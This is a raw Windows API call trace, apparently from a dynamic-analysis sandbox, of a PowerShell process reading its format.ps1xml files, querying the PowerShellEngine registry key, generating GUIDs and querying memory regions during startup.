	[0411.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.697] SetErrorMode (uMode=0x1) returned 0x1
	[0411.697] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0411.697] SetErrorMode (uMode=0x1) returned 0x1
	[0411.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.697] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0411.697] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0411.697] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0411.698] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0411.698] CoTaskMemFree (pv=0x2b9000) 
	[0411.698] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.699] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb3009e56, Data2=0xc88d, Data3=0x45ea, Data4=([0]=0x93, [1]=0x2d, [2]=0x68, [3]=0xbe, [4]=0xf, [5]=0x7e, [6]=0x70, [7]=0x2c))) returned 0x0
	[0411.699] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x92ba76c3, Data2=0x233, Data3=0x46ff, Data4=([0]=0xa9, [1]=0x7f, [2]=0x1d, [3]=0x17, [4]=0x60, [5]=0x8f, [6]=0x5a, [7]=0x1b))) returned 0x0
	[0411.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc1098cdd, Data2=0x6f8, Data3=0x4303, Data4=([0]=0x85, [1]=0x3a, [2]=0x4a, [3]=0x18, [4]=0x82, [5]=0x2e, [6]=0xe6, [7]=0x75))) returned 0x0
	[0411.700] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8beadce9, Data2=0x62dd, Data3=0x4ea0, Data4=([0]=0x89, [1]=0x78, [2]=0xc5, [3]=0x41, [4]=0x3b, [5]=0x8b, [6]=0x6c, [7]=0x30))) returned 0x0
	[0411.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xca1f6979, Data2=0x1c62, Data3=0x4692, Data4=([0]=0xa6, [1]=0xc6, [2]=0xfd, [3]=0x9, [4]=0x6e, [5]=0x93, [6]=0xa4, [7]=0x9b))) returned 0x0
	[0411.701] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x86214adb, Data2=0x598c, Data3=0x4933, Data4=([0]=0x9e, [1]=0x58, [2]=0x99, [3]=0xba, [4]=0x16, [5]=0x36, [6]=0xb8, [7]=0x95))) returned 0x0
	[0411.701] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.702] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x827ca1e5, Data2=0x1093, Data3=0x4570, Data4=([0]=0xaf, [1]=0x39, [2]=0xbe, [3]=0xad, [4]=0x94, [5]=0x14, [6]=0x7, [7]=0x9c))) returned 0x0
	[0411.702] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.703] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.704] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc4d85495, Data2=0x5607, Data3=0x4c81, Data4=([0]=0x95, [1]=0xcd, [2]=0x52, [3]=0xd9, [4]=0x2d, [5]=0x84, [6]=0x50, [7]=0x82))) returned 0x0
	[0411.704] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x84c2cf75, Data2=0xb3ff, Data3=0x433d, Data4=([0]=0xb4, [1]=0x43, [2]=0xd3, [3]=0xf2, [4]=0x1e, [5]=0x19, [6]=0x22, [7]=0x82))) returned 0x0
	[0411.704] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x99fe2d73, Data2=0x672f, Data3=0x4d90, Data4=([0]=0xa8, [1]=0x20, [2]=0xe, [3]=0x33, [4]=0x0, [5]=0x64, [6]=0x1b, [7]=0x32))) returned 0x0
	[0411.704] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x5543682a, Data2=0x26e7, Data3=0x4a41, Data4=([0]=0xbb, [1]=0x32, [2]=0x93, [3]=0xc6, [4]=0xd3, [5]=0xf2, [6]=0xf9, [7]=0xf))) returned 0x0
	[0411.704] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.704] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xadeb977e, Data2=0x46c6, Data3=0x492f, Data4=([0]=0xa7, [1]=0xe3, [2]=0xcb, [3]=0x30, [4]=0x54, [5]=0xe6, [6]=0x10, [7]=0xe7))) returned 0x0
	[0411.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.705] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xbde041f5, Data2=0xbe71, Data3=0x4297, Data4=([0]=0xbf, [1]=0x94, [2]=0xf8, [3]=0x78, [4]=0x37, [5]=0x22, [6]=0x60, [7]=0x6e))) returned 0x0
	[0411.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x89393a5, Data2=0x2f7f, Data3=0x42ea, Data4=([0]=0x87, [1]=0x6a, [2]=0xfe, [3]=0xee, [4]=0xb6, [5]=0x3a, [6]=0x80, [7]=0xa))) returned 0x0
	[0411.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xccc13f86, Data2=0x7506, Data3=0x410e, Data4=([0]=0xa9, [1]=0x63, [2]=0xca, [3]=0x3a, [4]=0x3e, [5]=0xe1, [6]=0xb0, [7]=0x4))) returned 0x0
	[0411.705] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xeac6f7d5, Data2=0x5de2, Data3=0x41e6, Data4=([0]=0xb9, [1]=0x1b, [2]=0xb3, [3]=0xd7, [4]=0x58, [5]=0xda, [6]=0xb8, [7]=0xa1))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xfd48d738, Data2=0x99ad, Data3=0x4895, Data4=([0]=0xb8, [1]=0x50, [2]=0x1e, [3]=0x7e, [4]=0x4b, [5]=0x38, [6]=0x35, [7]=0xa3))) returned 0x0
	[0411.706] VirtualQuery (in: lpAddress=0x20c140, lpBuffer=0x20d000, dwLength=0x30 | out: lpBuffer=0x20d000*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcabb4998, Data2=0x3f98, Data3=0x4105, Data4=([0]=0x90, [1]=0x32, [2]=0xa3, [3]=0x8e, [4]=0xd7, [5]=0x6c, [6]=0xd, [7]=0xd1))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x7fe11439, Data2=0x4e62, Data3=0x4db6, Data4=([0]=0xb8, [1]=0xf8, [2]=0x88, [3]=0x1a, [4]=0x3d, [5]=0x83, [6]=0xff, [7]=0x15))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x1fbeb75d, Data2=0x9df6, Data3=0x416b, Data4=([0]=0x87, [1]=0xb6, [2]=0xe6, [3]=0x34, [4]=0xfc, [5]=0x16, [6]=0x5, [7]=0xd4))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd404e009, Data2=0xb05f, Data3=0x43e5, Data4=([0]=0xa5, [1]=0x9f, [2]=0xc0, [3]=0x8b, [4]=0xb8, [5]=0x1b, [6]=0x1f, [7]=0x58))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf6e1d44b, Data2=0x4f8d, Data3=0x47be, Data4=([0]=0x9f, [1]=0xe6, [2]=0x7d, [3]=0x85, [4]=0x77, [5]=0x8f, [6]=0x51, [7]=0xef))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xda6f5ed, Data2=0xd7c4, Data3=0x4dbd, Data4=([0]=0x84, [1]=0x54, [2]=0x2f, [3]=0xa, [4]=0x14, [5]=0x41, [6]=0x5, [7]=0x22))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd0fb5d38, Data2=0xc881, Data3=0x4f32, Data4=([0]=0x96, [1]=0x19, [2]=0xf2, [3]=0xa6, [4]=0x30, [5]=0xeb, [6]=0x38, [7]=0x80))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9255bf3e, Data2=0x33a, Data3=0x4af5, Data4=([0]=0xa8, [1]=0xb2, [2]=0x5e, [3]=0x67, [4]=0xd3, [5]=0xb2, [6]=0x8e, [7]=0x68))) returned 0x0
	[0411.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcf883736, Data2=0xb0b8, Data3=0x4562, Data4=([0]=0xbe, [1]=0xae, [2]=0x5d, [3]=0xd1, [4]=0xa, [5]=0xba, [6]=0xda, [7]=0x9e))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x3b7a0b36, Data2=0xfe71, Data3=0x4b45, Data4=([0]=0xa8, [1]=0x20, [2]=0xc9, [3]=0xb8, [4]=0xcd, [5]=0x5e, [6]=0x37, [7]=0x23))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x31fdd056, Data2=0xdb2a, Data3=0x4f76, Data4=([0]=0xbd, [1]=0xd2, [2]=0xf3, [3]=0x87, [4]=0x2a, [5]=0xb6, [6]=0x65, [7]=0x7b))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4e82a50e, Data2=0x11f4, Data3=0x4c89, Data4=([0]=0xa4, [1]=0x12, [2]=0x4f, [3]=0xad, [4]=0xd8, [5]=0xf2, [6]=0x5e, [7]=0x96))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x95fd62a9, Data2=0x2525, Data3=0x46dc, Data4=([0]=0xbb, [1]=0x49, [2]=0x19, [3]=0xc, [4]=0x38, [5]=0x13, [6]=0xd6, [7]=0x98))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8dade8f8, Data2=0xd1c3, Data3=0x42c2, Data4=([0]=0x83, [1]=0x96, [2]=0x7a, [3]=0x20, [4]=0x85, [5]=0xf1, [6]=0xfc, [7]=0x77))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x60d12783, Data2=0x2b6a, Data3=0x4210, Data4=([0]=0x8f, [1]=0x22, [2]=0x8b, [3]=0x1, [4]=0x3, [5]=0xdf, [6]=0x64, [7]=0xe3))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xc302c916, Data2=0xd524, Data3=0x41f7, Data4=([0]=0xb9, [1]=0x71, [2]=0x7e, [3]=0x7e, [4]=0x85, [5]=0x62, [6]=0xa4, [7]=0x86))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb4dd5b88, Data2=0x958, Data3=0x4715, Data4=([0]=0xae, [1]=0x6e, [2]=0xe3, [3]=0xd1, [4]=0x75, [5]=0xd5, [6]=0x94, [7]=0x0))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xbe8b99be, Data2=0x3c03, Data3=0x4810, Data4=([0]=0x97, [1]=0x48, [2]=0xac, [3]=0x3, [4]=0xa6, [5]=0xd6, [6]=0x75, [7]=0x87))) returned 0x0
	[0411.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4c9994c3, Data2=0xa65e, Data3=0x4336, Data4=([0]=0xbd, [1]=0x63, [2]=0xbf, [3]=0xba, [4]=0xd6, [5]=0x3c, [6]=0x36, [7]=0x78))) returned 0x0
	[0411.708] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.708] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.708] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.708] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb3fc74f3, Data2=0x4720, Data3=0x4554, Data4=([0]=0x9f, [1]=0x2e, [2]=0xbb, [3]=0x1c, [4]=0x5e, [5]=0x9a, [6]=0x35, [7]=0x6))) returned 0x0
	[0411.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.708] SetErrorMode (uMode=0x1) returned 0x1
	[0411.708] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0411.709] GetFileType (hFile=0x2fc) returned 0x1
	[0411.709] SetErrorMode (uMode=0x1) returned 0x1
	[0411.709] GetFileType (hFile=0x2fc) returned 0x1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.709] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0411.710] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x119, lpOverlapped=0x0) returned 1
	[0411.710] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e5ed38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2e5ed38*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0411.710] CloseHandle (hObject=0x2fc) returned 1
	[0411.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.710] SetErrorMode (uMode=0x1) returned 0x1
	[0411.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0411.710] SetErrorMode (uMode=0x1) returned 0x1
	[0411.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.710] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0411.710] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0411.711] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0411.711] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0411.711] CoTaskMemFree (pv=0x2b9000) 
	[0411.711] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0411.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.712] VirtualQuery (in: lpAddress=0x20bd40, lpBuffer=0x20cc00, dwLength=0x30 | out: lpBuffer=0x20cc00*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.712] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x84f86fa4, Data2=0x5be4, Data3=0x4547, Data4=([0]=0xa6, [1]=0x1e, [2]=0x30, [3]=0xbf, [4]=0x76, [5]=0x4e, [6]=0x4b, [7]=0x15))) returned 0x0
	[0411.712] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.712] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9c18a93f, Data2=0x358c, Data3=0x4350, Data4=([0]=0xa8, [1]=0x92, [2]=0x2e, [3]=0x7, [4]=0x7c, [5]=0xf, [6]=0x1a, [7]=0xcd))) returned 0x0
	[0411.712] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb0548167, Data2=0x7fb9, Data3=0x4748, Data4=([0]=0x9d, [1]=0x86, [2]=0x12, [3]=0x86, [4]=0x3e, [5]=0xe7, [6]=0xe7, [7]=0x4d))) returned 0x0
	[0411.712] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe6d78ae0, Data2=0xedb8, Data3=0x4153, Data4=([0]=0x89, [1]=0x2f, [2]=0xa8, [3]=0x1d, [4]=0x58, [5]=0xf7, [6]=0xd2, [7]=0x52))) returned 0x0
